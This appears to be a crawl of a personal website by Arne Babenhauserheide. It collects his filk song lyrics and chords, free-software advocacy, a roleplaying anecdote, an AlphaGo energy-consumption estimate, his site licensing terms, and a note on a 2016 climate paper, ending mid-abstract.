Based on the Draft with Bodhran and Flute of Drak's song "Infinite Hands", I played around with the Audacity project, because the flute was too loud for me and at times unpleasant (especially on the higher notes).

Exactly which changes I made is listed in the README file of my Git/Mercurial project.

Git:

Mercurial:

Included are the lyrics, Drak's original Audacity project, and my version in both MP3 and OGG.

Morning has broken

Morning has broken
        beyond repair

the words are spoken
        now do you dare

to absolve of the error made
or will you die in your own shade?

New Horizons for Science

Farewell to friends -- and a love.

Download: mp3 audio | webm video; Watch on youtube

New recording 2019 at Intermezzo with Rika Körte and Steven Macdonald as recording engineers: mp3 audio


- PDF -

FilkTeX

Goodbye my love, I leave tonight,
I know you’re in new hands,
Though I would rather follow you,
That’s not the way that this is planned,
Our destiny will now be watched
by different eyes than mine,
I wish you just the best,
be sure we’ll meet again in time.

By now you’ve found somebody else,
to watch out over you,
Every new face I see wasted here,
it’s breaking me in two,
Maybe I should stay and fight
but my heart calls me away,
To that call I must be true,
you know, that is a father’s way.

I decided long ago,
about the way I feel for you,
but it has made no difference,
they are breaking you in two,
it’s true I swore me to your side,
come sunshine or come snow,
But as your faithful friend
I know, it’s time for me to go.

So goodbye to all the friends I’ve made
I’ll never be too far,
there’s much that I have learned from you,
of gluon, mind and star,
I’m grateful for the times we spent,
and all that we’ve been through,
the place I reached today,
I reached because of you.

Goodbye my love, scientia,
should I one day return,
I’ll no longer be a funds-beggar,
and then the tide will turn,
I know you love me as a friend,
but that’s not enough for me,
your paradigms I’ll shift, and then,
we’ll have a chance, you’ll see.

Copyright © 2017 Filk by Arne Babenhauserheide, License: cc by.
Music and original lyrics: Katja Buchmüller

A Filk on the Filk Song New Horizons by Katja Buchmüller. Recorded when I played it for the SAT group at IMK-ASF, KIT, after I signed my contract to move from science to software development.

The embedded video is compressed down to 5.6 MiB (thanks to awesome vp9 compression), so it’s suitable to be sent by email: new-horizons-for-science.webm

When you send it by email, your recipients might need a web browser to play it (until desktop video players catch up with the new video codecs on the web).

For more on science, see the Science-category page and especially Information challenges for scientific publishing, and counting scientific publications as metric for scientific quality is dumb, as well as propagating changes.

And if you enjoy this song in the EU, please tell your representatives before June 20 2018 to stop the bad parts of the copyright reform, so I can continue to do scientific work in my free time without having to work at a university. One major part of this is Article 13, which would require establishing upload filters for social media sites — and might have stopped me from sharing this song there, if it were the law today.

Update: We lost that in general; only legal battles remain. There’s quite a bit of research I now cannot do while those who just don’t care continue to collect whatever they want. I’m sorry for that. The EU Copyright Reform threatens my ability to do research in my free time, now that I left university to offer a future for my children. So please help keep links free (stop Article 11), keep data mining for independent researchers legal (stop Article 3), and keep automatic upload filters non-mandatory (stop Article 13).

Attachment  Size
2017-10-11-new-horizons-for-science-im-IMK-ASF-KIT-filk-song-arne-babenhauserheide-based-on-new-horizons-IMG_2297-vp9.mp3  1.17 MB
2017-10-11-new-horizons-for-science-im-IMK-ASF-KIT-filk-song-arne-babenhauserheide-based-on-new-horizons-IMG_2297-vp9.webm  5.37 MB
new-horizons-science.flk  2.32 KB
new-horizons-science.pdf  52.73 KB
new-horizons-science.png  24.39 KB
new-horizons-for-science-intermezzo.mp3  2.98 MB

Pond-erosa Puff (OpenBSD)

I recently found the OpenBSD songs, and the artists say that they are part of OpenBSD, logically as well as license-wise. And OpenBSD is licensed under a three-clause BSD license which is GPL compatible - that means I can record and publish it here!

This is the OpenBSD 3.6 release song: Pond-erosa Puff, written about people who make something free and suddenly decide to go the unfree path.

Many thanks to all you OpenBSD guys!
Your license is a bit too weak for my taste, but damn, it's free - and your code is as good as your songs!

Audio-files: ogg | mp3

This recording is part of the music podcast singing in the winds of time.

My recording is far from perfect, but I hope you enjoy it anyway! Also it should give a good head start to everyone who always wanted to play the song on the guitar. Oh, and please do listen to the ogg vorbis file. It sounds far better! - Draketo

Pond-erosa Puff (from Ty Semaka)


Well he rode from the ocean far upstream
Nuthin' to his name but a code and a dream
Lookin' for the legendary inland sea
Where the water was deep n' clean n' free

But the town he found had suffered a blow
Fish were dying, cause the water was low
Fat cat fish name o' Diamond Dawes
Plugged the stream with copyright laws

He said my water's good n' my water's free
So Pond-erosa, you gonna thank me!
Then he bottled it up and he labeled it "Mine"
They opened n' poured, but they ran outta time!

So Puff made a brand and he tanned his hide
Said. "this is the mark of too much pride"
Tied him to a horse, set the tail on fire
Slapped er on the ass and the water went higher!

Pond-erosa Puff
wouldn't take no guff
Water oughta be clean and free
So he fought the fight
and he set things right
With his OpenBSD

Well things were good fer a spell in town
But then one day, dang water turned brown
Comin' to the rescue, Mayor Reed
He said, "This here filter's all ya'll need"

But it didn't take long 'fore the filter plugged
Full of mud, n' crud, n' bugs
Folks said "gotta be a gooder way"
Mayor said "Hell No! She's O.K."

"The water's fine on the Open range"
And he passed a law that it couldn't change.
"No freeze, no boil, no frolicking young"
Puff took him aside, said "this is wrong"

Then he found the Mayor was addin' the crud!
So he took him down in a cloud of blood
Said "The Mayor's learnd, he's done been mean"
So they did it right and the water went clean!

CHORUS

So once agin' it was right, but then
The lake went dry, she was gone again!
Fish started flippin' and floppin' about
Yellin' "Mercy Puff! It's a doggone drought!"

So he rolled up-gulch till he hit the lake
Of Apache fish, they was on the take
They'd built a dam that was made of rules
Now Puff was pissed and he lost his cool!

I'm sick and tired of these goldarn words!
n' laws n' bureaucratic nerds!
You're full o' beans n' killin' my town
and if you's all don't shut er down

I'll hang a lickin' on every one
of you sons o' bitchin' greedy scum!
So he blew the dam, an' he let 'er haul
Cause water oughta be free for all!

CHORUS


License: The text is licensed under a 3-clause BSD license; the recording can be used under the usual free licenses and additionally under the 3-clause BSD license (the license doesn't enforce that, but I feel that it's just the right thing to do).

Attachment  Size
Pond-erosa-puff.ogg  3.41 MB
Pond-erosa-puff.mp3  4.51 MB

Realistically Me (the square root)

-Melody partly from "Swing low, sweet chariot"-

He looked over squares, and what did he see?
coming just for driving him mad,
The rational numbers didn't fit for me,
coming just for driving him mad.

He looked over pentagrams, and what did he see?
coming just for driving him mad,
There was funny looking a cousin of me,
coming just for driving him mad.

He told his pupils, all the world is a number,
coming just for driving him mad,
And one of them said: "this one makes me wonder"
coming just for driving him mad,

He told him of me, and to his growing dread,
coming just for driving him mad,
He proved my being, and what did he get,
Pythagoras just wanted him dead.

I'm the square root,
The funny square root,
gave him a bad mood,
Just me, the square root,
And everything in me is good!

(being irrational can be great! :-) )

Seiken Densetsu 3 Bardstale

The introduction story of Angela from the SNES game Seiken Densetsu 3 (SD3), which you play when you start the game with her as main character, done in song form. Info about her and about that game: http://www.fantasyanime.com/mana/som2char_2.htm

This is the first song I ever wrote myself, text, melody and guitar, and I am still not quite satisfied with the way I can play it.


-> ogg vorbis music file.

It's missing a violin. (I played it once together with a fiddler, and it was exactly what I imagined. But I had no recording accessories at hand at that time, and I'm sad we weren't able to play together more often... I hope you still like it the way it is now!)

Songtext and chords:

SD3 Bardstale Chordsheet
Chord Sheet (PDF)

Seiken Densetsu 3 Bardstale

Chords:

D A E G
D A C G

Ref: d a d a
d a C G

The power of the magic, the magic of the spell,
brought her out of danger, brought her out of hell.
Beauty in her eyes and beauty in her face,
magic in her heart, but no magic in the mind.

Her mother was against her, the queen of the castle,
crying out for power, for power to prevail.

Ref: Lonely girl, beautiful girl, arrogant girl with magic in her heart.

Her queen needed a life, taken away from a human,
tried to take another, another than her own,
Her kingdom was freezing, the mana was fading,
by fleeing her mother, she finally ran away.

Ref: Lonely girl, beautiful girl, arrogant girl with magic in her heart.

Carried by the magic, the magic in her heart,
safe from the grip of her mothers magic hands,
Alone in the cold, but living at least,
she awoke outside the castle and ask'd her where to go.

- New Chords: -
- d a e a -
- a C G a -

Slowly she walked south to be attacked by fierce fiends,
after the victory the cold took her in its hands.

- d C a -
- Strummed: D A E G -

She awoke in the bed of an all unknown house,
selfishly stepping out without a thank you.

Attachment  Size
seiken-densetsu-3-bardstale.ogg  3.39 MB
seiken3.pdf  72.21 KB
seiken3-thumb-310x438.png  48.29 KB

Soul of Wind

To the melody of Firesoul by Aryana. Text written around 2007 by Draketo (Arne Babenhauserheide).

  e                           G
I dance with the wind, for my soul needs to fly,  
  a                e             D
I move through the storm just to look at the sky  
  e                      D           e
I stay of my own will, I need to fly free,  
    a            e           D           e
and just one can bind me and that one is me.

I crave for the gusts, the wind on my wings,
In flight there’s no border, no queens and no kings,
I go where I want and you can’t keep me in,
I need to stay moving, leave friends and leave kin.

I know where I’m going, I’ve chosen my way,
Must heed only myself, whatever you say,
Don’t mourn for my passing, we might meet again,
just savor each moment, for struggling’s in vain.

My power is freedom, my path is my own,
If no one is near, I will walk it alone,
For only that way I have power to fly
so don’t ever bind me or else I will die.

I dance with the wind, for my soul needs to fly,
I move through the storm just to look at the sky
I stay of my own will, I need to fly free,
and just one can bind me and that one is me.

PS: And bind me I did. See Storm through Rock.

Storm through Rock

To the melody of Firesoul by Aryana. Text written 2016 by Draketo (Arne Babenhauserheide). A filk on Soul of Wind, for life is change and change reflects in living songs.

  e                        G
I sigh in the wind, for my soul wants to fly,  
   a                e             D
to wing through the storm just to look at the sky  
  e                        D           e
but choices are made and I stand by my word,
    a             e       D         e
and don’t care if anyone but me has heard.

I move on my path, I’ve chosen my way,
each crossing takes possible futures away,
but never to choose just worsens my need,
and a choice fast retracted does not make a street.

I love stories of choices which people take far,
but most stories show people who will find a star,
so they don’t show which hardships can happiness bring,
or the mission you choose for yourself with a ring.

I now find little freedom in paths without aim,
I’m older, I’m stronger, I’ve chosen my game,
children ask others, that’s not my concern,
I’m walking my path and its harvest I’ll earn.

Freedom is different when some ways I block,
For wind to play music, you guide it through rock,
A storm roaming freely gains strength through the sun,
where channelled through mountains it’s yielding to none.

My power is freedom, my path is my own,
with friends walking near, I am never alone,
for humans need kinship for strength to survive,
knowing you all helps my dreaming to thrive.

For in this special weekend where freedom I live,
I gain strength from fire and healing I give,
from all of your voices, your friendship and dreams,
for something like joy means much more than it seems.

The truth is in there - Maxwell gives us the speed of light

- a Filk on "X as in Fox" by Cecilia Eng -

Once we believed in the speed of the light,
and experiments show that what we thought is right,
But we search our math for another sight,

'Cause we hope that the truth is in there.

When we measure the speed of something somehow,
we can only check against the distance, but now
we'll show that we get it from Maxwell', and wow!

We will know that the truth is in there!

First we take a sheet of charge at hand,
then we move it by an unseen command,
and nabla rot B shows the field where we stand,

And we know that the truth is in there.

Now that formula says, our field's everywhere,
when about the electrics we never care,
but that can't be true, for our world's still there,

And we know that the truth is in there.

Since nabla rot E is -dB/dt,
a field can never change at once all that we see,
It takes some time, which gives us the v,

And we guess that the truth is in there.

So now we take a small square far from the sheet,
when we check the change in B, it then shows quite neat,
It is width times the speed times B, which we need,

To see that the truth is in there.

For we also know that an electric field,
round a loop is (as Stokes will quickly yield),
Just the length of the loop times the strength of the field,

That's a clue that the truth is in there.

For now we take both and make the loop small,
so the length in a field is its width, and we call,
"E is v times B", which gives us all

To believe that the truth is in there.

We then do the same for nabla rot B,
But there's a c squared so we easily see,
E is also c squared times (B divided by v),

And we see that the truth is in there.

For with these we can easily tell,
that v must be c which we like so damn well,
For now we are sure we're right when we yell,

We know that the truth is in there!

So what do we know from this funny tale?
The strength of the fields leads us through the veil,
and gives us the speed of light without fail,

So we see that the truth is in there!

Now we only need to measure the attraction of charge,
and then the attraction of flowing charge,
and the root of their quotient might be quite large,

But it gives us the truth that's in there.
The invariant truth that's in there.


Jepp, that's a way to get the speed of light from the Maxwell equations and the knowledge that our world still exists :)
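
For those who prefer formulas to verses, here is the song's argument restated compactly (a sketch for a plane wave with field amplitudes E and B travelling at speed v; "nabla rot" in the lyrics is the curl \nabla\times, and the c^2 is the 1/(\mu_0\varepsilon_0) from the Ampère–Maxwell law):

\nabla\times\vec E = -\frac{\partial \vec B}{\partial t} \;\Rightarrow\; E = v\,B
\qquad
\nabla\times\vec B = \frac{1}{c^2}\,\frac{\partial \vec E}{\partial t} \;\Rightarrow\; E = \frac{c^2}{v}\,B

Setting the two expressions for E equal:

v\,B = \frac{c^2}{v}\,B \;\Rightarrow\; v^2 = c^2 \;\Rightarrow\; v = c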

I hope you enjoyed reading the song as much as I enjoyed writing it!

Volkoi

There’s music in their stamping,
in their shouting to above,

There’s rhythm in their life,
in fight and death and love,

(There's rhythm in their stance,
in strike and blow and bluff,)

Where nobler people seek the truth
and never find their hearts,

A Volkoi’s always on his toes,
when the music starts.

— Eschrandar, Nayan War Engine, Mechanical Dreams (sadly only the store is left of this great game…)

With Python from the Shadows

- Written by Draketo aka Arne Babenhauserheide, originally to the melody of Moonlight Shadow on 2008-02-22, but switched to its own melody on 2008-06-27 to be able to put a recording under free licenses -


Audio-files: ogg
This recording is part of the music podcast singing in the winds of time.

With Python from the Shadows

First time ever I saw it,
carried away by its lightweight structure,
My heart grew fuzzy and sunlit,
carried away by its lightweight structure,

All I saw was the relevant part,
deep inside every programs core,
It flowed like my thoughts but it looked like art,
So clear that at once I saw through.

-

The bridge of doom I was then crossing,
carried away by its lightweight structure,
The guardsman into darkness tossing,
carried away by its lightweight structure,

( "What is the fastest way to store a list of unicode chars?"
"A mutable or an immutable list?"
"I don't know... Aaaargh!" )

It's a month now since I passed that whitening guard,
deep inside every programs core,
To know what I want is the hardest part,
since the code I can simply see through.

-

Ref: I chime, I rime, see you with Python all the time,
I chime, I rime, see you with Python, next time.

-

Four a.m. in the morning,
carried away by its lightweight structure,
you can see my fingers are still coding,
carried away by its lightweight structure,

All it takes is an idea in me,
For stuff inside any programs core,
And the code flows freely for my mindview to see,
So clear that at once I see through.

-

- Ref -

-

mmmmmmm
carried away by its lightweight structure,
mmmmmmm
carried away by its lightweight structure,

I write too late, even typing grows hard,
mmmmmmm
The night is heavy and my lids will not part,
but my mind can still simply see through.

Attachment  Size
with-python-from-the-shadows-own-melody.ogg  1.35 MB
With Python from the Shadows-with-chords.txt  2.59 KB

Broken Apple Heart - Why I'm a Mac user no more

Beware of that Fruit (Broken Apple Heart) ( http://bah.draketo.de/?p=13 )

(What do you think, why Macs no longer Smile?)

Chorus: I was an Apple User and loyal to the core,
But one grey day I realized what made my heartache soar,
They want to make the big bucks now and want no one to see,
That ever more surveillance takes the Users rights as fee.

I was a little Bugger, when I saw the first of Mac,
Discovered there then Shufflepuck and all the time came back,
It belonged to parents friends then, but my will it showed its grip,
And when they tried to take “My Mac”, their efforts meant a zip.

My third Mac, it was bigger, not so cute, but lovely, too,
And to my greatest pleasure, I owned the smiling goo,
I was a big fanatic, Apple was it all the time,
And when I got to talking, all my friends could do was whine.

Then came the time of MacOSX, it was the thing for me,
The beta was the slowest beast, but with it I felt free,
I worked and it grew faster and I never bid the time,
And every single Update pushed the speed another line.

But then they made the panther and it hated my old Mac,
And though I bought a new one, my belief did not come back,
Then came OSX on intel, my belief lost every race,
Apple takes “trusted computing”, hits me squarely in the face.

Now my Mac here owns a Linux and Apple makes no gain,
Since for my precious income I want freedom and no chain,
So I switch on to a Linux, MacOSX I use the least,
with those lovely little penguins I take midsummers feast.

Some days I’m feeling sad and my parting brings me pain,
But without freedom for their Users, all their genius is in vain,
When I’d come back to Apple, I will tell them with delight,
To get me back they must adhere to freedom and my rights,
They must adhere to freedom and to every Users rights.


Dear Steve Jobs,

I once left Apple after a Life of using Macs because you included the TPM chip in the Intel Macs, and I’ve been an active opponent to Apple ever since, because DRM and Trusted Computing aka Treacherous Computing go against everything I believe right in informatics and you had just made Apple the spearhead of DRM.

I’m not likely to return as a user (I’ve grown too fond of KDE for that), but I am likely to return as a supporter, if you decide to give your users back the right to manage their own computers freely.

DRM takes away freedom from users, and I can’t support anybody who takes the freedom of people to turn it into profit. You have the option now, to shape Apple into a “good guy” again, and I urge you with all my heart to do it. You broke my heart in the past, but you might be on the way to mend it… and until you do so, I’m going to sing the song into which I shaped my pain back then:

A GNU Head, redrawn

For my new Neo keyboard I wanted the GNU head from GNU and the plussy from FSFE on the meta/super keys (those which often carry a Windows logo). Sadly the normal GNU head did not work very well with the laser from Schubi, so I grabbed my tablet, fired up mypaint and created a new one, building on the old, but adding more contrast and stronger lines. I hope you like it!

A GNU head, redrawn

See the attachments for other versions, OpenRaster and SVG source.

And if you like it, please leave a comment!

PS: And my spacebar says “Infinity’s ours and infinity’s free”! *happy*

Attachment  Size
a-gnu-head-redrawn-clean.png  67.24 KB
a-gnu-head-redrawn.png  446.15 KB
a-gnu-head-redrawn.ora  1.4 MB
a-gnu-head-redrawn-clean.svgz  21.67 KB
a-gnu-head-redrawn-clean-simplified.png  14.27 KB
a-gnu-head-redrawn-clean-simplified.svgz  6.03 KB
a-gnu-head-redrawn-clean.ora  1.52 MB
a-gnu-head-redrawn-clean-small.png  27.9 KB

A roleplaying easter holiday 2011

We played Exalted on Sunday morning, slaying a second circle demon before nightfall, and Dresden Files (FATE) until 2 o'clock at night. We had a cross in the room, though: it was screwed tightly into the wall, so we could not get rid of it without damaging the wall, so it stayed there…

Well, playing solar and lunar exalted (warriors of the gods) and a renegade dragonblooded (normally weaker exalted, but slayers of solars and lunars, because those are prone to go mad) and burning glowing pillars of light into the night sky after finishing off the bambi-faced, brown-skinned, fan-armed demon directly after she was reborn from hell might count as serving the gods, don’t you think ;)

Seeing my character’s mother dead on the field of battle was a major blow, though. She died in this battle because I betrayed my kin to help the solar, who had become my friend before his exaltation and whom I had been sent to kill. My family was disgraced, so it is my fault that she got sent on this mission against a huge demon. I removed her armor and burned her in my anima’s fire on a funeral pyre made from her 11 dead companions in full armor. When nothing was left but the dark-red glowing armor of her companions, I took her armor and moved back to the tavern where we had lived, while the other exalted were invited to a huge festival given by tale spinner and dream weaver, two of the town’s three most powerful gods.

… [snipped reply] …

@Anonymous This is not about pixels. We play Pen-and-Paper, so we sit around the table and spin the tale ourselves. 12 people in two groups, 2 game masters, 5 players each. The game masters describe the world and we describe what we do and act out what our characters say - like improvisation theater with self-created characters and longer play-time; and more creative worlds, since we don’t need to show the worlds to anyone else: They only need to be alive in our own heads.

But yes: I burned in passionate anger myself when I saw my mother dead on the battlefield. And when we shouted at each other while talking about the best strategy, our emotions flared up - after making sure that it was OK for everyone involved in the shouting to let them flare up. You can live the emotions of your character and know that they are from your character - even when you come close to slitting each other’s throats (“I throw my swords on the ground and call up to you: ‘I betrayed my own kin to save your damn life! Don’t you throw it away now! Calling our enemies to us is idiocy!’” - Chireka, renegade dragonblooded, to Bright Arrow, dawn-caste solar exalted).

That’s better than anything you can experience in the movies or in books, because it is you experiencing it and acting it out and deciding what you do. And the one I shouted with and I really enjoyed ourselves doing so: Our eyes glowed brightly when we talked about it afterwards: The intensity was awesome: “Chireka so wants to kill your character - that was great!”

The game master asked me afterwards whether the death of my mother wasn’t over the top, but I could wholeheartedly deny that: It was exactly the right thing to make my character burn with anger in the final battle. And as a fire-aspected dragonblooded that meant that she literally burned.

The only problem we have now is that Chireka is not that sure anymore if betraying her kin to save the solar was the right thing to do. But that is a tale for another day :)

The important point is: Even though you live your character while you play, it’s still just description and numbers on a piece of paper, just like characters in a book. When the play is finished, the character becomes a treasured memory, like other heroes of fiction do - but you know that it was you who created him/her/it, and you shared a part of his/her/its life for a few hours.

PS: The rules of the game create a safety net against submerging completely: When your character acts to change something, you roll dice to see what happens, so there is always a level of abstraction behind which you can step, if the intensity grows too high - just like you can take a break when reading a book or watching a video-tape.

PPS: On Friday and Saturday we played Werewolf; the easter roleplaying weekend is our yearly “Extremspielwochenende” (extreme gaming weekend). I wrote this post as a reply in Freenet (Sone) to what we did on Easter Sunday.

AlphaGo uses more power than 3000 humans

Update 2017-11: Alpha Go Zero consumes just about 1-2 kW. I definitely underestimated the speed of development — by around a factor of 20. Alpha Go Zero only consumes as much energy as 10-20 humans.

Update 2017: OpenAI used a single machine to beat a Dota champion → DENDI 1v1 vs BOT AI - TI7 DOTA 2. I may be underestimating the speed of development.

AlphaGo recently defeated the world Go champion. Go was thought to be unbeatable for computers, but machine learning cracked it.

This year, AlphaGo will challenge multiple players — and support players at the Future of Go Summit in Wuzhen, China. It seems humans are completely outpaced.

Mind the energy consumption

But when you think about the games, keep in mind that AlphaGo likely uses several hundred kilowatts of power: According to Wikipedia it had around 2000 CPUs and 250 GPUs when it played against Lee Sedol, each likely taking more than 300W of electricity. On top of that it used millions of simulated training games to sharpen its skills.

Humans on the other hand have around 100W of power (and can’t easily charge up), with only about 30W of that available to power their brains. Even when counting only the GPUs, AlphaGo has a higher power consumption than 3000 humans. That’s more power consumption than all professional Go players together (around 1000).

Learning from AlphaGo?

Brady Daniels also showed on YouTube that he considers the games of AlphaGo pretty easy to understand (but hard to beat), while the article about the Go Summit in Wuzhen quoted players who said that seeing AlphaGo win was liberating: they dared to try new moves.

And this might actually have pretty plausible1 explanations: Different from humans, AlphaGo could play millions of death matches — against itself. It is the equivalent of a street fighter who only fights professionals now and then, but who could follow up on each fight by training endlessly in real battles to see which of the strategies actually work out in typical fights. Humans just don’t have that much lifetime.

The interesting part you need to keep in mind when you try to learn from AlphaGo: If you try to generalize from this without testing your understanding in real battles, you might build ceremony which looks like AlphaGo but doesn’t work. Essentially cargo-culting Go.

(It would be interesting to see whether we could parallelize humans well enough to counter the processing power of AlphaGo with our much lower energy consumption.)

»Could every one of us have an AlphaGo?«

To answer this question, we need to look at the energy consumption and the world energy production.

Assuming 2000 CPUs at 300W each, AlphaGo would currently use 600kW of power. With around 3 terawatts of world electricity generation, the world could keep about 5 million AlphaGo computers running — if we did not need the energy for anything else. That’s only one per 1000 people, one per 100 people if we only run it a few hours per day, and only if all of them use the same training, which gets copied over.
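
As a sanity check, here is the arithmetic of that estimate as a tiny Python sketch; the per-CPU wattage and the 3 TW figure are the assumptions from the text above, not measured values:

# rough estimate with the assumptions stated in the text
cpus = 2000                  # CPUs of the Lee-Sedol-era AlphaGo (per Wikipedia)
watt_per_cpu = 300           # assumed electrical draw per CPU, including overhead
alphago_watt = cpus * watt_per_cpu            # 600,000 W = 600 kW

world_generation_watt = 3e12                  # assumed ~3 TW of world electricity generation
print(world_generation_watt / alphago_watt)   # 5000000.0 -> about 5 million AlphaGos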

(Note that consuming as much energy as 3000 human bodies does not mean that AlphaGo actually costs as much as 3000 skilled human workers, since electrical energy is pretty cheap (600kW only costs about 60€ per hour, assuming a rate of 0.1€ per kWh, and it’s bound to get cheaper with the switch to renewable energy sources) and food is only a small part of the cost of living in industrialized countries. The minimum subsistence level in Germany only provides 4.40€ for food per day and person, which translates into roughly 50ç per work hour, but due to rent, heating and other expenses, the minimum hourly salary is about 10€, and the cost of highly skilled labor is about 100€ per hour. One AlphaGo needs as much energy as 3000 humans, but its electricity only costs as much as 6 hours of minimum-wage work, which is a dilemma for industrialized nations, because the economic incentives do not fit the actual resource consumption.)

But if Moore’s Law holds (halving of the energy requirement per computation about every two years), an AlphaGo of 2037 should only require 600W and by 2047 your smartphone should be able to run an AlphaGo. The development speed of computer hardware is awesome (but very expensive).
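
The same projection as a small sketch, assuming a clean halving every two years from the 600 kW starting point above (the real curve is of course less regular):

# halve the energy need every two years, starting from the 2017 estimate
power_watt = 600_000.0
for year in (2037, 2047):
    halvings = (year - 2017) / 2
    print(year, power_watt / 2 ** halvings)   # 2037: ~586 W, 2047: ~18 W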

Algorithmic improvements might make it available far sooner.

Related: Having the power to run 5 million robots with AlphaGo technology that are trained on StarCraft sounds pretty worrying — and might become reality within a few years. The tech for that is being made right now. In case you have a better use in mind: TensorFlow and Sonnet are available as Free Software (not implying that winning in StarCraft is a bad use by itself — it could also serve as training for disaster aid and similar).


  1. That this sounds plausible does not mean that I’m right. 

Foreign Lands

We will help you, my dear friends,
to bomb and conquer foreign lands,

It won't be attack, nor a sin,
as we will be the ones, who win,

and should someone then criticize,
we'll show our muscles to his eyes,

so never should again he say,
that foreign lands will foreign stay.

Defend ourselves, is what we do,
and our friends defend us, too,

So it's a real honor thing,
that defend bells of yours we'll ring,

whatever is your property,
we'll die for it, as you will see,

and if it's now not one of yours,
soon it will be, we'll help, of course.

-- Your German friends.

Gary Gygax (1938-2008) - he made the world a better place

It's strange to think that Gary Gygax is gone, if only bodily.

Here in Germany his creation is fighting a deadly battle with DSA (a German fantasy RPG which came out just after DnD and which raised me to be what I am today), and it's not quite clear which rules they use for that, but it's likely that DSA wouldn't have existed if it hadn't been for DnD setting an example.

Neither would the many roleplaying worlds and systems which sprang into existence after DnD.

I owe many thanks to Gary Gygax, though I only began playing DnD in one of my rounds about a year before his death.

He was one of the creators of our hobby, and I believe that he not only made our world more fun, but also made it a better place.

I don't believe in a heaven, but he achieved about the most a person can achieve in our world.

And I know that this isn't a normal letter of condolences.
I just can't look at him with regret, now, but only with deep gratitude.

- Arne Babenhauserheide aka Draketo

Tributes by others:

And many more which are gathered at Enworld News who seem to do this gathering far better than I could.

Also an email account was created to send a letter of condolence without swamping his main mail account: http://www.freeyabb.com/phpbb/viewtopic.php?t=4378&mforum=trolllordgames

Licenses

All content of these sites is under free licenses, except where explicitly noted otherwise.

This means you can use my works however you want (even commercially), as long as you allow and enable others (and me) to do the same with all works you create from my works or using parts of them, and say who created and modified the original works.
The works must stay under the same license(s).

To use them, you can (for example) just put this license text alongside them (e.g. as an html page) and create a link pointing to it. Alternatively just put the following at a well-visible position on your creation:

Copyright [YEAR] [your name and other contributors] and [YEAR] Arne Babenhauserheide. Provided under free licenses, including GPLv2 or later, cc BY-SA, GNU FDL without invariant sections, Art Libre and the "Lizenz für Freie Inhalte". Details: http://draketo.de/licenses

More exactly: My works can be used (depending on the type of content) under the following free licenses:

Programs/Applications are only available under the GPL, other content under all five licenses.

I keep the right to relicense all content on these sites under other licenses, as long as those other licenses make sure that the "four freedoms" are being kept. If you contribute here, you give me permission to do this.

I use five licenses to avoid walking into a license trap (having all content under a dead license). Please also keep all five licenses when you work with content from these sites.

More detailed info can be found on the German version of this site.

Limitation: Sadly I’m so pragmatic that I’d likely go against these principles if I had to make a living from my creations and realized that I couldn’t do so while following my principles.

That’s why I’m fighting now for a future in which everyone can make a living with free licensed creations (for example because no one buys unfree works anymore). With this I might be able to allow myself - or at least other people in the future - to earn a living in an ethical way.

My Top 20 most popular articles as of 2015

I asked myself: Are the most popular articles on my site the ones I like best?

Here are the top 20 articles from my site, by language and topic:

English:

German:

So my typical reader1 cares about source code management, Emacs, privacy and technical elegance, likes working in a convenient, though nonstandard environment, does not fall for corporate propaganda, reflects on social interaction and enjoys creative adaptation of free software idealism. In case he or she speaks German, my typical reader is also interested in questioning what we commonly learn about reality.

And that combination is pretty interesting, so I hope we’ll meet some day ☺.

So, dear typical or non-typical reader: Welcome to my site! ☺ I’m glad you read what I write, and I hope you enjoy it! Please check back from time to time to see what’s new.

PS: Maybe I’ll write some other day what I miss in this list.


  1. The typical reader is a statistical fiction, munged together from many very different groups. Few of you will be exactly like the typical reader. But it’s interesting to investigate anyway. And if you also read the other articles in this list, and they pique your interest, my invention of the typical reader of draketo.de actually brings this typical reader into reality today2. Got you ☺ 

  2. Most of my typical readers won’t read this at the publication date, because they only find my articles over various social news platforms, so if you now feel cheated by being tricked into becoming a typical reader without having a say in the matter, check the publication date and see my evil gamemaster’s grin (egg: ;-]). If you feel cheated, I got you today (but it’s still true ;-]) - and if you want to stop being a typical reader and start being a statistical individual3 again, go on and read those of my other articles which really interest you (and read more of my writing - because that’s why I write this site: I want you to read it, and today I’m playing dirty ^_^)! Now go and read more! ☺ 

  3. giggling crazily 

Science

For or about scientific work.

The scientific method in a dent/tweet (140 characters)

science in a dent:

(1) Form a theory. (2) Design an experiment to test the theory. (3) Do it. (4) Adjust the theory, if needed → (2)

→ written in GNU social.

Please feel free to use it!

If that’s too brief:

the scientific method, explained very basically and simply.

and

That’s not faith. It’s theory. The difference is that there’s a clearly defined way to adjust the theory, when it’s wrong.

German version: Die Wissenschaftliche Methode in 130 Zeichen


Naturally this is still vastly oversimplified, but that’s the price you pay for trying to explain a complex system in 140 characters. What to remember: theory and experiment go side by side and fertilize each other. New theories allow finding new experiments which answer questions in the theories and allow finding new theories (or changes to old theories – or tell us which directions of fleshing out theories will likely be useful).

PS: If you have other dents or tweets about science, please feel free to add and link them in a comment.
Just like this text they need to be licensed under free licenses.

Hansen 2016 got through peer-review — “Ice melt, sea level rise and superstorms”

If this should prove to be right, it’s serious.

I’m not an expert on all the topics brought together in the paper, but I never saw stronger scientific writing than what I now read in the peer-reviewed publication, and the topics I do know are represented correctly.

Update 2018-09-03 by Aengenheyster et al. 2018: For »reaching the 1.5 K target […] MM would be required to start in 2018 for a probability of 67%.« MM means getting a 2% increase of the share of renewables every year. This is still a 33% risk of failure!

Update: Hansen 2017: Young people's burden: requirement of negative CO₂ emissions — a last, desperate chance to prevent what is shown in the paper linked below.

Even if you don’t think you get new information from the paper, if you have an interest in scientific writing, I strongly suggest reading the paper:

It is long. And great. And Open Access.

If you don’t want to read that much, you can watch James Hansen explain the gist himself:

https://www.youtube.com/watch?v=JP-cRqCQRc8

@Article{Hansen2016,
AUTHOR = {Hansen, J. and Sato, M. and Hearty, P. and Ruedy, R. and Kelley, M. and Masson-Delmotte, V. and Russell, G. and Tselioudis, G. and Cao, J. and Rignot, E. and Velicogna, I. and Tormey, B. and Donovan, B. and Kandiano, E. and von Schuckmann, K. and Kharecha, P. and Legrande, A. N. and Bauer, M. and Lo, K.-W.},
TITLE = {Ice melt, sea level rise and superstorms: evidence from paleoclimate data,
climate modeling, and modern observations that 2 °C global warming
could be dangerous},
JOURNAL = {Atmospheric Chemistry and Physics},
VOLUME = {16},
YEAR = {2016},
NUMBER = {6},
PAGES = {3761--3812},
URL = {http://www.atmos-chem-phys.net/16/3761/2016/},
DOI = {10.5194/acp-16-3761-2016},
ABSTRACT = {
We use numerical climate simulations, paleoclimate data, and
modern observations to study the effect of growing ice melt from
Antarctica and Greenland. Meltwater tends to stabilize the ocean
column, inducing amplifying feedbacks that increase subsurface
ocean warming and ice shelf melting. Cold meltwater and induced
